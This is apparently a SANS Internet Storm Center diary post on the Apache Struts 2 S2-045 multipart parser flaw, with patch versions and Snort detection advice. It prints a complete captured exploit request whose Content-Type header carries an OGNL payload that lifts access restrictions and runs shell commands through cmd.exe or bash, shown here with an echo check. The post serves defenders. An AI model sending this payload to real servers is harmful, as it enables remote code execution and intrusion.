On Monday, Apache released a patch for the Struts 2 framework [1]. The patch fixes an easy to exploit vulnerability in the multipart parser that is typically used for file uploads. A Metasploit module was released that same day, and some readers reported seeing already exploit attempts in the wild.
You should be running Struts 2.3.32 or 2.5.10.1. All prior versions are vulnerable.
Struts 2 is a Java framework that is commonly used by Java-basedweb applications. It is also knowns as Jakarta Struts and Apache Struts. The Apache project currently maintains Struts.
The vulnerability allows an attacker to include code in the Content-Type +http://www.baidu.com/search/spider.html..
Content-Type: %{(#nike=multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=echo \587d7b356191903a8ff327f548766288\).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://linux.cn/
Accept-Language: zh-cn
Content-Length: 0
Host: [removed]
Connection: Keep-Alive
Yes... the content type header is quite long. About 800 bytes. It should be easy to catch these exploit attempts with Snort by just setting the max_header_length parameter in the http_inspect preprocessor. I havent tried it yet, but setting this to 500 should work fine (the default is 750, which should work too).
Snort.org included a rule in Tuesdays subscriber update.
The exploit should work on Windows and Linux. It tests which operating system it runs on via @java.lang.System@getProperty(os.name). It it runs on Windows, then it will execute cmd.exe /c followed by a command (highlighted in red in aboves sample). One Unix, it will execute /bin/bash -c followed by the same command.
Commands I have seen so far:
Simple vulnerability checks:
echo Struts2045
echo \587d7b356191903a8ff327f548766288\
(Virustotal identifies this as a generic backdoor. Seehttps://www.virustotal.com/en/file/db98788729f4810f64f9ff7b279dd69ef47942b87fc259fefc56e30f3aedb171/analysis/ )
Packet capture of the exploit running against a lab system
[1]https://cwiki.apache.org/confluence/display/WW/S2-045
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.